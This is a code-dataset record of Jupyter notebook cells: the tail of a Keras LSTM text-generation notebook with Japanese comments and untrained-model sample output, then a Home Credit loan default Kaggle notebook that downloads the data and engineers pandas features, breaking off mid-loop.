LSTMの入力は (バッチ数, 入力シーケンスの長さ, 入力の次元) となる(バッチ数は省略)\n# maxlenを変えてもパラメータ数は変化しない(各時刻でパラメータは共有するため)\n# 128は内部の射影と出力の次元(同じになる)\nmodel.add(LSTM(128, input_shape=(maxlen, len(chars))))\n# 出力の128次元にさらにFCをくっつけて文字ベクトルを出力\nmodel.add(Dense(len(chars))) # 出力\nmodel.add(Activation('softmax'))", "Build model...\n" ], [ "model.summary()", "_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nlstm_9 (LSTM) (None, 128) 95232 \n_________________________________________________________________\ndense_8 (Dense) (None, 57) 7353 \n_________________________________________________________________\nactivation_8 (Activation) (None, 57) 0 \n=================================================================\nTotal params: 102,585\nTrainable params: 102,585\nNon-trainable params: 0\n_________________________________________________________________\n" ], [ "optimizer = RMSprop(lr=0.01)\nmodel.compile(loss='categorical_crossentropy', optimizer=optimizer)", "_____no_output_____" ], [ "# 
200285個の長さ40の時系列データ(各データは57次元ベクトル)の意味\nprint(X.shape, y.shape)", "(200285, 40, 57) (200285, 57)\n" ], [ "def sample(preds, temperature=1.0):\n preds = np.asarray(preds).astype('float64')\n # temperatureによって確率が変わる???\n preds = np.log(preds) / temperature\n exp_preds = np.exp(preds)\n preds = exp_preds / np.sum(exp_preds)\n probas = np.random.multinomial(1, preds, 1)\n # 確率が最大のインデックスを返す\n return np.argmax(probas)", "_____no_output_____" ], [ "for iteration in range(1, 60):\n print()\n print('-' * 50)\n print('Iteration', iteration)\n\n # 時系列データを入力して学習\n# model.fit(X, y, batch_size=128, epochs=1)\n \n # 学習データのランダムな位置の40文字に続く文字列を生成する\n start_index = random.randint(0, len(text) - maxlen - 1)\n\n generated = ''\n sentence = text[start_index: start_index + maxlen]\n generated += sentence\n\n print('----- Generating with seed: \"' + sentence + '\"')\n sys.stdout.write(generated)\n\n # 400文字分生成する\n # この400文字を生成している間、LSTMに内部状態が保持されている?\n for i in range(400):\n x = np.zeros((1, maxlen, len(chars)))\n\n # sentenceを符号化\n # このsentenceは400回のループで生成された文字を加えて次送りされていく\n for t, char in enumerate(sentence):\n x[0, t, char_indices[char]] = 1.0\n\n # 57次元(文字数)の出力分布\n # (系列長=40, データ次元=57) を入力\n preds = model.predict(x, verbose=0)[0]\n\n # もっとも確率が高いのを選ぶのではなくサンプリングする?\n next_index = sample(preds, diversity)\n next_char = indices_char[next_index]\n\n generated += next_char\n\n # 入力は長さ40にしたいので今生成した文字を加えて1つ先に送る\n # このsentenceが次の入力となる\n sentence = sentence[1:] + next_char\n\n sys.stdout.write(next_char)\n sys.stdout.flush()", "\n--------------------------------------------------\nIteration 1\n\n----- diversity: 0.2\n----- Generating with seed: \"now--it dawns upon men that\nthey have pr\"\nnow--it dawns upon men that\nthey have prroaaooooanaaoahoooaaaaoaaaaoaooaaaantaooaaaaaaaoanoooaoaaaooaaoaooooaaanaoaaaaoaohaoaaaoaaaaoaaoaaoaaoaoaoonaahaooaoaaaaaaaooaaoaohacooaaoaohoooonaaaoaoaohooaooaoaaaohooaoooaaaoaorooaaoaaaanaaaaoaahooaaaaaaoaaaaoaoaonaaaaaoaaoaaoaaaoaooaoonnanoaaaaoaoahaalocnoaaaonaannoaanaaaaanaahaaaaooaaolaaohanaaaaaaaoaoaoaonoaoaaoaroaoooaaaoaaahoaaaaaoooaoaooaaonnaaaoaoaoaaahaaaaaaaaaooanaaaanaoaooaaonoaaaarna\n\n----- diversity: 0.5\n----- Generating with seed: \"now--it dawns upon men that\nthey have pr\"\nnow--it dawns upon men that\nthey have prooaarrahllcoaannnoatoaaaotaoooonanaoahonhhtaaoahonoonnnaraaanooonlnaolaotoataacacatoaehanooncaioloaaitoolatatahllranaaaoohahloonanaoloohohancnchnohaaalooaaaahotartalnoahonahrnnnonroaaaooaoooaonoanooaohrdaacodhcthnaococoaoahooroaohlncanotrollanaoaohooaoathnaaornaanaoadlnrhlcaoroacrcohntaaaoahoaanolocoaahhonootaaollanonhaaoactohchcnadnaordnlnattaaclrnrohnrnndhaaloonoatnonwaaaaoloonoononlnaaaaanrahat\n\n----- diversity: 1.0\n----- Generating with seed: \"now--it dawns upon men that\nthey have pr\"\nnow--it dawns upon men that\nthey have prlohrrcwohahc-hderaoyinaanodddtlhohcoancorncrhcooh sohodcrcc aeonaonhdoaarn-olatpryhrhtlnwhhronaalrdcoannhoorhdlonoitantaaahcaanrcolrlraaloatnrononoorunrrdhnnlchoo llearavihonrahoaadoitctcaoowchiucatvawlrtlahhccolahnatan lnorncaoannooaaa thrhoia rhnrcdlrnaaarhronhayctlnaahoaolcholh,rhlahdaolnroccoonoolohtcn nalndarhddnnioolooolroaialcaahartnarloaanlntonaitaocdnhtolawvwohnaianaoocoinlrniaalfnlnnarll\n\n----- diversity: 1.2\n----- Generating with seed: \"now--it dawns upon men that\nthey have pr\"\nnow--it dawns upon men that\nthey have propnawrhcaeoslthnohhncsnoi\nooldnnawd.taeonoaaa ahaortntchorrfhaadanaddt(atoct\nnanho ohancirhnlatoroltnoa 
hcaohnidahtlilnotlollnalfaofaaotnwtblnnnaooholoallho-oosnnthloapdalcthhctclocthpdwtaaticolcnlehntcwto\naaahoaarlocnthcnt-rhctn \n notondoiiosnhdnshristrtloraacodtcartwlrn onlotlniodooz odhcclsonrnnaontnnaaoah tpo dhilalenotdahohoaoanyhohnoat5ghnlaaoanlntonndatallaclocyonaosnc-landratrnacloah stadd\n\n--------------------------------------------------\nIteration 2\n\n----- diversity: 0.2\n----- Generating with seed: \"uation\nis at the back of all their logic\"\nuation\nis at the back of all their logicaooaaananaaohaaooaaoaaaaaaaaooaaaoahnoaaaanaaaaaoaoaaaaaaaoaoalnnaaaonoaoaaaanaoaaoaaanaaoaanooaaaaanoaaaaaoaooaaaanaanoaaaaaaaaaaaonaaaoaooaaoooaaooononaaaaaaaooaaaoaaaaaaaaaonlanaaacaaaoaardahaoaoaanooaaaaaaorooaaoaaaananaaonaooooaaaroanohnaaaaaaaaranoaaaaaoaaaoaoaanoalanoonoaoarnoaaaaahaoaaaaoaaaaaanaaaaaaoaaoaooanoooaoaaaooaoooroaaaaaaoaooaaaaoaaooaaaooaaaaaaoaaaaaonaaaooaonoaaoaoaooaanaanaano\n\n----- diversity: 0.5\n----- Generating with seed: \"uation\nis at the back of all their logic\"\nuation\nis at the back of all their logicoalnaroahcnaonnaoraraal hoocaaarlonionocohnclhootlhtoctolaanroaccocaaooaoonoltorroaaalaroard oocdotrlorahandlnlrahcaochoaaaaldaoaaloco-oolonaalolharaaaoohaoahaannaaohaolacwn aionantaooooooaaaaoaoaocolannoaaooohohaonaacolctahlo lohaoodllonooahaoohtcnaohhooonohnaonnoalroaaoonttoonhotholooanracnoaahlcacooananrrolohtoorrohoaaaaonrorrolhhnaatoalntloodnohnraorooaooaaraoanraaaohhlooddnolaaarrlnrooraoaoah\n\n----- diversity: 1.0\n----- Generating with seed: \"uation\nis at the back of all their logic\"\nuation\nis at the back of all their logicalohhtarioaharnnlhowhotcwaohrcnlaraocdnwoahiahanaoaihoattnnnawohataoennnronacoorganaolsalrdaonahannaarpananatcoydddlhavhnonhhnalooldtwhaoanooh natnloheoidshadwyahoaco ootahcnorodhhhaadradlyoc hohnrnnrwocllaohdnoanadrnldhnrhloraolaonlnhwndrhoaaoncthlcrltonartoaalnhoahwanhoaothnrircc thnonsaacnhl cenhddolaraa noaachadooolg ylnlsodslaor dnlnnoccaalcopalcrnahrhranorrotilliasnldllaaa nhraaanhhcatnowlc\n\n----- diversity: 1.2\n----- Generating with seed: \"uation\nis at the back of all their logic\"\nuation\nis at the back of all their logicohaoa iiydeloon atntclonwnlwniriaocatoaroolaccrttannhhnooaohonaritaloacdehlhrfoodlnsebnoohtdronaoahacwnnrorfcnnrdd haonlnhcnhdtnl tahrotirwrchcdehahcsahrnhtdfnloonphotlla cnrcoaoaorcndhnrhlrth-nhdrnnaa0occehantaatonpodrr\nhnchnvlhopoldhaaohptstnonhaoehhcatoaconsoohaoddnodnoanaacaan-narlo,oaiylaahctoyodcaoreaoiniaanaodthsohoncladnoo\nnrrlhohs coailindhtnhdtaatpcnclwotoalrocracanrh caoactal?lcaononn\n\n--------------------------------------------------\nIteration 3\n\n----- diversity: 0.2\n----- Generating with seed: \"t it is difficult to preach this\nmoralit\"\nt it is difficult to preach this\nmoralitoooaaooooaaaaoaoaaooooooalaaoraonaaanaaanooanaaaanoaoaaaaaoaaaooaaroaaaoaoaaaaoaaannaolaaaaoaoaaoaaaaaaoaaoaaaaaoanoooolaaooaaahaaooanaaoaonoaoalaoaoaaaooaaaaoalaoooaaaooaacraaaooaooaaooaaanaaaaaooaaoaoooaaaaaonoaaaaraaohnnaaahraaaaoaaaaaaaaroaaooaooaraoaoaaaoaooonaaaoaooooaoaooooaonaoaaaalaanaaooaooaoaoahoaaaaaaaaaaooooaaanaaaaaalonoaaaonaoonaaloaaaaaanaaaaoooaoaonaaaanaaoaoaoaaaaaaaoaonanoononao\n\n----- diversity: 0.5\n----- Generating with seed: \"t it is difficult to preach this\nmoralit\"\nt it is difficult to preach 
this\nmoralitoaonaaaanotnhnanoohuhhactolaraaahcroacaattoannaonhhaaloodaaatonraloooaraanooooraooalaoataaonhadarooroahononaoancarhhnaoaoarooroanohnccadcathoatocoaarannonaaoactnaoanacaaadnolneaaaolohahoooaooalnnlhanaohooooarnaooalnnnoronaaddanaoharcohaaanwaoaarainotooochdthaoadahloallanacoclhorooooho noohrnrlrnaochnnaonraooaoanaothaonotrhtwacohnaaoaaatoooraaaoonoiaotnoarraoooanaooaadrnhodthaaaaocontoaraonnehronnl\n\n----- diversity: 1.0\n----- Generating with seed: \"t it is difficult to preach this\nmoralit\"\nt it is difficult to preach this\nmoralitralanlhoy edlaaashtochaoraachahhlnldnarnooocrohwolcioocciaaowcoltiho aachdliloalcwaclooaoalaniodsaoddwioladhhnfaolldtacahohnpatrntrachadahttoaahrdanpoatlaahoolyannasanrdlaeoahdrdtveohrhaoolpehevohrlds nntnadoronoaooclhnoahdrtonlcnacrinlchhohn hlolohtlaropoobaochdc aonhodapwnnasrohinaalhacatnaacl\nrrooooncrnolhaelacocaalsacnndehiaeannacconl aoatno adonaooooooonnocncslarnanhatlcoai crhcvrrtahantodioa\n\n----- diversity: 1.2\n----- Generating with seed: \"t it is difficult to preach this\nmoralit\"\nt it is difficult to preach this\nmoralitiadncctdwrncrrdrnhrolociocaaiaalcadiaarcccavdh-ooihhilnaonactoonnvddaaaoalacwcalrlyhtholllhoadhdnd p1nrannlci?adn ndoaalcla dclnoreonhthoyraodtaononhlfnacanhoo nlodcaahhhoociroaaidoohalwlrtoaolocohatl hwairaortaa c.cayaorridtcrocgntllwlaolaaloldorhaniplooflyonptlhrhclnaonayluttnawaaaacycaidlyohlonahnonaltehrsntccarlhnarhlnawnaonaallralottapaasorcc,thearrsldlswodohlanntonsaglcaaha laplorwéonorcaahr\n\n--------------------------------------------------\nIteration 4\n\n----- diversity: 0.2\n----- Generating with seed: \"ns of transition, for the sake of lighte\"\nns of transition, for the sake of lighteaoaaaalaaoaaoaanoaoaanoaaaaaaaaaooaoaaaoaaaaaoaanaaaaanaoooaoaaooaooaoohoooaaaaaooaaaoaaooaraooaaaoolonoohaaaaaaoonoaaaaooanaaaacaaaooaoaaaaooohnoaaanaaaaoaaaaaaaaaaooaaaaaaoooaaoaaaaoaoaaatonooorahoaoaaoooraaaaaaaaoooaaoaaononoaaaaaaanaaoaaaaaanaaaaooaaaoaanconoconaaaaaooaooaoonnaoaaaoaooooaoanaaoaaaanoaaaaoaaaaanoohoaooaoloaooaaaaaoaoloonnaaaaaaanaooooanaaooaoooaanaaaoaaaaaooaoooaaaaoaacaaaraoaa\n\n----- diversity: 0.5\n----- Generating with seed: \"ns of transition, for the sake of lighte\"\nns of transition, for the sake of lightecatahacaonaoaaathaoaclnaaladahccroacnoaro naonalrnaonononrrnclhaaranallranalaoocnordcdrnonoontacoaooinidloaohohdahrhaaahololarahroraoaaaaaaotaoaaacltlaallhoolctrhooaoinhcrlcnhoaacaonhnodocoronlaoaoahaaaaanoohdaonnhoncadnaoaoolnhlantoarcaaaarlaoalannnhlaoeoaoaoahararonawooonnn ohaadnlnoonanddoaoaoaaohnaalnahoaoohlodaaoaaaanantaaaooorooaaccoaltoatcaloorltorhailalodoacanonaataotlrahoolrnarnalnrhatrro\n\n----- diversity: 1.0\n----- Generating with seed: \"ns of transition, for the sake of lighte\"\nns of transition, for the sake of lighteubcahorattacdaadocronwhtihwdtrdacdsghaahcnaldccahannoatahaehodonondrrchrtupncranrirdnorotnvonl hlconaaartcltrloatnatcnpacohtroannrraayahaahthcdnotdco8nlsaweadnictthacrororwohnoarodlntlanaorhpcnrlododlorovnohcclodaaocloanhaaaaonhturoroh drniawaorhhotaaahhcooantaaronalaawolclrtnhdcwtiarnhooanlrrnthenl tttthtnracacatohtcaadrhaoainhoaanadoarocscaarohrn rannandcnnothhaaonoaolccoa eocnahtchoooalcdnsnhwo\n\n----- diversity: 1.2\n----- Generating with seed: \"ns of transition, for the sake of lighte\"\nns of transition, for the sake of lighteyldhoiddrnlybnnnooa- hlhadtrlols raamohwnahnndnoccnnewraohwcwo hohfeodhlntawrdolnhrahnahd\nyoaspacwwcncirolrrnannocrturloocahhr ydahlcairholnca-ni honovtawnatclrhvio-adorrc irrlnrhdaandha 
-hltcohllaatrccooctonrchrdlcohrtanowtthofhirayarnehlahaninatltortoooblhaaoosrcdddaraorahrrargrrnooctront toaooawioaorodho rnohnnclincaoxyanioiolrccigroooolaotahwa aanaieohchthaaarnwc hrhlaroihhcoc crhaarhnttco rhn\n\n--------------------------------------------------\nIteration 5\n\n----- diversity: 0.2\n----- Generating with seed: \"rateness,\nmoderation and the like come, \"\nrateness,\nmoderation and the like come, ooaaanoaaaaaaooaaaaoonaooohaaaoaaaraoahaaooaooootaaooooooaoaaooaaaaoaaaoaaaaaoaaaaaaoaooaaananaaaaaaoaaooaoooanaocoaaaaoooaaoahoaaoaoooaoaaaaaaoaaaaaanoonoaoooooaaoaoaoaonoaaaaaaaoroaaaaaoaaaannonoloaoaaaannaoaaahaaaanaoooaoooooooaoaaooanhaoooaanaaoaaaaanaaaaoaooonoahnaaaaaaoaoooaoahaaaoarooaaaaannnnaooooaaaooaoaaaoooaaaanoaahaoaoaooaoaoaoaaaaoahornaonoroaaaaaoahaaaaaaooononoonaaaaaaaoaaonaaoaooaa\n\n----- diversity: 0.5\n----- Generating with seed: \"rateness,\nmoderation and the like come, \"\nrateness,\nmoderation and the like come, noaoooaatcaraahaiatooarnharnhaaoaaohonodnarooahaalalhoaaaooahnaoooaloooooadaocadnaaoltrohnnaonaratlorncoaoaorlnnoaodaanadnrorrncocrohhchnoahaaoanaahondihochaaohaonorotraa asoarnnltnconanooatoaaoalohlooooccooaanlndrhocnaootohacaalaaancttanaroarnhtanaannaaaoalaaaralarhaonnooadlaacanaaoooaonnonoornatdaaancoaaahonnaaaoooaanoanoaaahonnaaaoaaaarcrroanhnwron oootonohaooarconohdoddnaotoalooloonhdaaaanaaha\n\n----- diversity: 1.0\n----- Generating with seed: \"rateness,\nmoderation and the like come, \"\nrateness,\nmoderation and the like come, an\ndwooahnalataccotnadoonccdslloncaltla olsdranoradcathndoncannraooalddapyhnltaahorohaiaanhorolainrrnnalhacanonnioahrtnhlannoowtoctdarah cocochlcddfnanawaneowalolhdotanhdthaaanraansaoloar dallaowhitlalohaoaa olccaolhcln asoagrl-aacdlnrtinanaiapw hhcdacodnatnraaopcaaoaaraccoa ntaraondattndlaooawnodnpatortwaoontahelnihhaorhchaiaacharooodaroccnnollaetrhloo o ahahrooarntawwrcohonaonnaohnhaao\noatlnoclr\n\n----- diversity: 1.2\n----- Generating with seed: \"rateness,\nmoderation and the like come, \"\nrateness,\nmoderation and the like come, chnngironchhnahlloawcordaldaanhc.aarcrwtonaotnlcaath\nrr arlntpiloalt aloahnclawenaoaahnoratctlsnocnrnooohil-ttwoaaonohohahdcinoohaihghanaoiaocerfdonhhothd raooonwlhc a rrthatvostancoorohnliawoeoahranodoaa-lhf ahotaacow arlroanvaohha-ol l chd\nrttirarnhditaahrrtooryor0pcao,nootl lo ynco odlgtapainaiasarnnic aa oishl owiocdntyiahlatcoalaroonchvenacdootawallddalhanniccphdrntrvhrstaoroaastachocoteelon\n\n--------------------------------------------------\nIteration 6\n\n----- diversity: 0.2\n----- Generating with seed: \"ount to noble and servile, master and sl\"\nount to noble and servile, master and slaanaoanaaaaananaaaoaahoaaaoaoaaoaaaanoohaoahoaonooaooroaaaaaoronoaoooaaanaooaaoooaaaanrhhooaaaahaoonoooaoaalaaaoaaraoahnaocaoaaaoonaooloaoaaoaaaaaaoaanoonaooaaaaoaoaaaaaaoaaoaaaaaaooaaaaaaoaaaaooaahaaaaoaaaoaaooaonooaaaaoaoaacaaaaaaaaoranraaaaoahaaaooaaaoaaaaaaaaaooaaooaooooanooaanoaoaaaaaaaalaaoaaaaaaooooaoooaaooaoanaooaaaoaaaaaoaraaaahaaoaahaoaaaaaooaoaooaaaaaaaaaoaooaaooooaaoooaaoaaanaoaoaoraaa\n\n----- diversity: 0.5\n----- Generating with seed: \"ount to noble and servile, master and sl\"\nount to noble and servile, master and slaoalhanaatoaannlcootalnaoaharhah" ], [ "\n", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1ca0a7905111a78a686907b2000abe20f1ae34
68402
ipynb
Jupyter Notebook
notebooks/CSE499A/Home_Credit_Loan.ipynb
sakibsadmanshajib/Home-Credit-Loan-Default-Risk-Analysis
1f1ef81741f1fd9467e4890a485ce774b6324f1b
[ "MIT" ]
null
null
null
notebooks/CSE499A/Home_Credit_Loan.ipynb
sakibsadmanshajib/Home-Credit-Loan-Default-Risk-Analysis
1f1ef81741f1fd9467e4890a485ce774b6324f1b
[ "MIT" ]
1
2021-04-17T16:22:04.000Z
2021-09-27T07:56:52.000Z
notebooks/CSE499A/Home_Credit_Loan.ipynb
sakibsadmanshajib/Home-Credit-Loan-Default-Risk-Analysis
1f1ef81741f1fd9467e4890a485ce774b6324f1b
[ "MIT" ]
1
2021-09-22T07:40:00.000Z
2021-09-22T07:40:00.000Z
35.150051
138
0.55706
[ [ [ "from google.colab import files\nfiles.upload()", "_____no_output_____" ], [ "!mkdir -p ~/.kaggle\n!cp kaggle.json ~/.kaggle/", "_____no_output_____" ], [ "!pip install kaggle", "_____no_output_____" ], [ "!chmod 600 /root/.kaggle/kaggle.json", "_____no_output_____" ], [ "!kaggle competitions download -c home-credit-default-risk", "_____no_output_____" ], [ "!unzip \\*.zip -d dataset", "_____no_output_____" ], [ "!rm -R sample_data", "_____no_output_____" ], [ "!rm *zip *csv", "_____no_output_____" ], [ "import os\nimport gc\nimport numpy as np\nimport pandas as pd\nimport multiprocessing as mp\nfrom scipy.stats import kurtosis\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.linear_model import LogisticRegression\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport warnings\nfrom sklearn.model_selection import train_test_split, cross_val_score, StratifiedKFold, KFold\nimport xgboost as xgb\nfrom xgboost import XGBClassifier\nfrom functools import partial\nfrom sklearn.ensemble import RandomForestClassifier\nimport lightgbm as lgb\nwarnings.simplefilter(action='ignore', category=FutureWarning)", "_____no_output_____" ], [ "DATA_DIRECTORY = \"/content/dataset\"", "_____no_output_____" ], [ "df_train = pd.read_csv(os.path.join(DATA_DIRECTORY, 'application_train.csv'))\ndf_test = pd.read_csv(os.path.join(DATA_DIRECTORY, 'application_test.csv'))\ndf = df_train.append(df_test)\ndel df_train, df_test; gc.collect()", "_____no_output_____" ], [ "df = df[df['AMT_INCOME_TOTAL'] < 20000000]\ndf = df[df['CODE_GENDER'] != 'XNA']\ndf['DAYS_EMPLOYED'].replace(365243, np.nan, inplace=True)\ndf['DAYS_LAST_PHONE_CHANGE'].replace(0, np.nan, inplace=True)", "_____no_output_____" ], [ "def get_age_group(days_birth):\n age_years = -days_birth / 365\n if age_years < 27: return 1\n elif age_years < 40: return 2\n elif age_years < 50: return 3\n elif age_years < 65: return 4\n elif age_years < 99: return 5\n else: return 0", "_____no_output_____" ], [ "docs = [f for f in df.columns if 'FLAG_DOC' in f]\ndf['DOCUMENT_COUNT'] = df[docs].sum(axis=1)\ndf['NEW_DOC_KURT'] = df[docs].kurtosis(axis=1)\ndf['AGE_RANGE'] = df['DAYS_BIRTH'].apply(lambda x: get_age_group(x))", "_____no_output_____" ], [ "df['EXT_SOURCES_PROD'] = df['EXT_SOURCE_1'] * df['EXT_SOURCE_2'] * df['EXT_SOURCE_3']\ndf['EXT_SOURCES_WEIGHTED'] = df.EXT_SOURCE_1 * 2 + df.EXT_SOURCE_2 * 1 + df.EXT_SOURCE_3 * 3\nnp.warnings.filterwarnings('ignore', r'All-NaN (slice|axis) encountered')\nfor function_name in ['min', 'max', 'mean', 'nanmedian', 'var']:\n feature_name = 'EXT_SOURCES_{}'.format(function_name.upper())\n df[feature_name] = eval('np.{}'.format(function_name))(\n df[['EXT_SOURCE_1', 'EXT_SOURCE_2', 'EXT_SOURCE_3']], axis=1)", "_____no_output_____" ], [ "df['CREDIT_TO_ANNUITY_RATIO'] = df['AMT_CREDIT'] / df['AMT_ANNUITY']\ndf['CREDIT_TO_GOODS_RATIO'] = df['AMT_CREDIT'] / df['AMT_GOODS_PRICE']\ndf['ANNUITY_TO_INCOME_RATIO'] = df['AMT_ANNUITY'] / df['AMT_INCOME_TOTAL']\ndf['CREDIT_TO_INCOME_RATIO'] = df['AMT_CREDIT'] / df['AMT_INCOME_TOTAL']\ndf['INCOME_TO_EMPLOYED_RATIO'] = df['AMT_INCOME_TOTAL'] / df['DAYS_EMPLOYED']\ndf['INCOME_TO_BIRTH_RATIO'] = df['AMT_INCOME_TOTAL'] / df['DAYS_BIRTH'] \ndf['EMPLOYED_TO_BIRTH_RATIO'] = df['DAYS_EMPLOYED'] / df['DAYS_BIRTH']\ndf['ID_TO_BIRTH_RATIO'] = df['DAYS_ID_PUBLISH'] / df['DAYS_BIRTH']\ndf['CAR_TO_BIRTH_RATIO'] = df['OWN_CAR_AGE'] / df['DAYS_BIRTH']\ndf['CAR_TO_EMPLOYED_RATIO'] = df['OWN_CAR_AGE'] 
/ df['DAYS_EMPLOYED']\ndf['PHONE_TO_BIRTH_RATIO'] = df['DAYS_LAST_PHONE_CHANGE'] / df['DAYS_BIRTH']", "_____no_output_____" ], [ "def do_mean(df, group_cols, counted, agg_name):\n gp = df[group_cols + [counted]].groupby(group_cols)[counted].mean().reset_index().rename(\n columns={counted: agg_name})\n df = df.merge(gp, on=group_cols, how='left')\n del gp\n gc.collect()\n return df", "_____no_output_____" ], [ "def do_median(df, group_cols, counted, agg_name):\n gp = df[group_cols + [counted]].groupby(group_cols)[counted].median().reset_index().rename(\n columns={counted: agg_name})\n df = df.merge(gp, on=group_cols, how='left')\n del gp\n gc.collect()\n return df", "_____no_output_____" ], [ "def do_std(df, group_cols, counted, agg_name):\n gp = df[group_cols + [counted]].groupby(group_cols)[counted].std().reset_index().rename(\n columns={counted: agg_name})\n df = df.merge(gp, on=group_cols, how='left')\n del gp\n gc.collect()\n return df", "_____no_output_____" ], [ "def do_sum(df, group_cols, counted, agg_name):\n gp = df[group_cols + [counted]].groupby(group_cols)[counted].sum().reset_index().rename(\n columns={counted: agg_name})\n df = df.merge(gp, on=group_cols, how='left')\n del gp\n gc.collect()\n return df", "_____no_output_____" ], [ "group = ['ORGANIZATION_TYPE', 'NAME_EDUCATION_TYPE', 'OCCUPATION_TYPE', 'AGE_RANGE', 'CODE_GENDER']\ndf = do_median(df, group, 'EXT_SOURCES_MEAN', 'GROUP_EXT_SOURCES_MEDIAN')\ndf = do_std(df, group, 'EXT_SOURCES_MEAN', 'GROUP_EXT_SOURCES_STD')\ndf = do_mean(df, group, 'AMT_INCOME_TOTAL', 'GROUP_INCOME_MEAN')\ndf = do_std(df, group, 'AMT_INCOME_TOTAL', 'GROUP_INCOME_STD')\ndf = do_mean(df, group, 'CREDIT_TO_ANNUITY_RATIO', 'GROUP_CREDIT_TO_ANNUITY_MEAN')\ndf = do_std(df, group, 'CREDIT_TO_ANNUITY_RATIO', 'GROUP_CREDIT_TO_ANNUITY_STD')\ndf = do_mean(df, group, 'AMT_CREDIT', 'GROUP_CREDIT_MEAN')\ndf = do_mean(df, group, 'AMT_ANNUITY', 'GROUP_ANNUITY_MEAN')\ndf = do_std(df, group, 'AMT_ANNUITY', 'GROUP_ANNUITY_STD')", "_____no_output_____" ], [ "def label_encoder(df, categorical_columns=None):\n if not categorical_columns:\n categorical_columns = [col for col in df.columns if df[col].dtype == 'object']\n for col in categorical_columns:\n df[col], uniques = pd.factorize(df[col])\n return df, categorical_columns", "_____no_output_____" ], [ "def drop_application_columns(df):\n drop_list = [\n 'CNT_CHILDREN', 'CNT_FAM_MEMBERS', 'HOUR_APPR_PROCESS_START',\n 'FLAG_EMP_PHONE', 'FLAG_MOBIL', 'FLAG_CONT_MOBILE', 'FLAG_EMAIL', 'FLAG_PHONE',\n 'FLAG_OWN_REALTY', 'REG_REGION_NOT_LIVE_REGION', 'REG_REGION_NOT_WORK_REGION',\n 'REG_CITY_NOT_WORK_CITY', 'OBS_30_CNT_SOCIAL_CIRCLE', 'OBS_60_CNT_SOCIAL_CIRCLE',\n 'AMT_REQ_CREDIT_BUREAU_DAY', 'AMT_REQ_CREDIT_BUREAU_MON', 'AMT_REQ_CREDIT_BUREAU_YEAR', \n 'COMMONAREA_MODE', 'NONLIVINGAREA_MODE', 'ELEVATORS_MODE', 'NONLIVINGAREA_AVG',\n 'FLOORSMIN_MEDI', 'LANDAREA_MODE', 'NONLIVINGAREA_MEDI', 'LIVINGAPARTMENTS_MODE',\n 'FLOORSMIN_AVG', 'LANDAREA_AVG', 'FLOORSMIN_MODE', 'LANDAREA_MEDI',\n 'COMMONAREA_MEDI', 'YEARS_BUILD_AVG', 'COMMONAREA_AVG', 'BASEMENTAREA_AVG',\n 'BASEMENTAREA_MODE', 'NONLIVINGAPARTMENTS_MEDI', 'BASEMENTAREA_MEDI', \n 'LIVINGAPARTMENTS_AVG', 'ELEVATORS_AVG', 'YEARS_BUILD_MEDI', 'ENTRANCES_MODE',\n 'NONLIVINGAPARTMENTS_MODE', 'LIVINGAREA_MODE', 'LIVINGAPARTMENTS_MEDI',\n 'YEARS_BUILD_MODE', 'YEARS_BEGINEXPLUATATION_AVG', 'ELEVATORS_MEDI', 'LIVINGAREA_MEDI',\n 'YEARS_BEGINEXPLUATATION_MODE', 'NONLIVINGAPARTMENTS_AVG', 'HOUSETYPE_MODE',\n 'FONDKAPREMONT_MODE', 'EMERGENCYSTATE_MODE'\n ]\n for doc_num in 
[2,4,5,6,7,9,10,11,12,13,14,15,16,17,19,20,21]:\n drop_list.append('FLAG_DOCUMENT_{}'.format(doc_num))\n df.drop(drop_list, axis=1, inplace=True)\n return df", "_____no_output_____" ], [ "df, le_encoded_cols = label_encoder(df, None)\ndf = drop_application_columns(df)", "_____no_output_____" ], [ "#df = pd.get_dummies(df)", "_____no_output_____" ], [ "bureau = pd.read_csv(os.path.join(DATA_DIRECTORY, 'bureau.csv'))", "_____no_output_____" ], [ "bureau['CREDIT_DURATION'] = -bureau['DAYS_CREDIT'] + bureau['DAYS_CREDIT_ENDDATE']\nbureau['ENDDATE_DIF'] = bureau['DAYS_CREDIT_ENDDATE'] - bureau['DAYS_ENDDATE_FACT']\nbureau['DEBT_PERCENTAGE'] = bureau['AMT_CREDIT_SUM'] / bureau['AMT_CREDIT_SUM_DEBT']\nbureau['DEBT_CREDIT_DIFF'] = bureau['AMT_CREDIT_SUM'] - bureau['AMT_CREDIT_SUM_DEBT']\nbureau['CREDIT_TO_ANNUITY_RATIO'] = bureau['AMT_CREDIT_SUM'] / bureau['AMT_ANNUITY']", "_____no_output_____" ], [ "def one_hot_encoder(df, categorical_columns=None, nan_as_category=True):\n original_columns = list(df.columns)\n if not categorical_columns:\n categorical_columns = [col for col in df.columns if df[col].dtype == 'object']\n df = pd.get_dummies(df, columns=categorical_columns, dummy_na=nan_as_category)\n categorical_columns = [c for c in df.columns if c not in original_columns]\n return df, categorical_columns", "_____no_output_____" ], [ "def group(df_to_agg, prefix, aggregations, aggregate_by= 'SK_ID_CURR'):\n agg_df = df_to_agg.groupby(aggregate_by).agg(aggregations)\n agg_df.columns = pd.Index(['{}{}_{}'.format(prefix, e[0], e[1].upper())\n for e in agg_df.columns.tolist()])\n return agg_df.reset_index()", "_____no_output_____" ], [ "def group_and_merge(df_to_agg, df_to_merge, prefix, aggregations, aggregate_by= 'SK_ID_CURR'):\n agg_df = group(df_to_agg, prefix, aggregations, aggregate_by= aggregate_by)\n return df_to_merge.merge(agg_df, how='left', on= aggregate_by)", "_____no_output_____" ], [ "def get_bureau_balance(path, num_rows= None):\n bb = pd.read_csv(os.path.join(path, 'bureau_balance.csv'))\n bb, categorical_cols = one_hot_encoder(bb, nan_as_category= False)\n bb_processed = bb.groupby('SK_ID_BUREAU')[categorical_cols].mean().reset_index()\n agg = {'MONTHS_BALANCE': ['min', 'max', 'mean', 'size']}\n bb_processed = group_and_merge(bb, bb_processed, '', agg, 'SK_ID_BUREAU')\n del bb; gc.collect()\n return bb_processed", "_____no_output_____" ], [ "bureau, categorical_cols = one_hot_encoder(bureau, nan_as_category= False)\nbureau = bureau.merge(get_bureau_balance(DATA_DIRECTORY), how='left', on='SK_ID_BUREAU')\nbureau['STATUS_12345'] = 0\nfor i 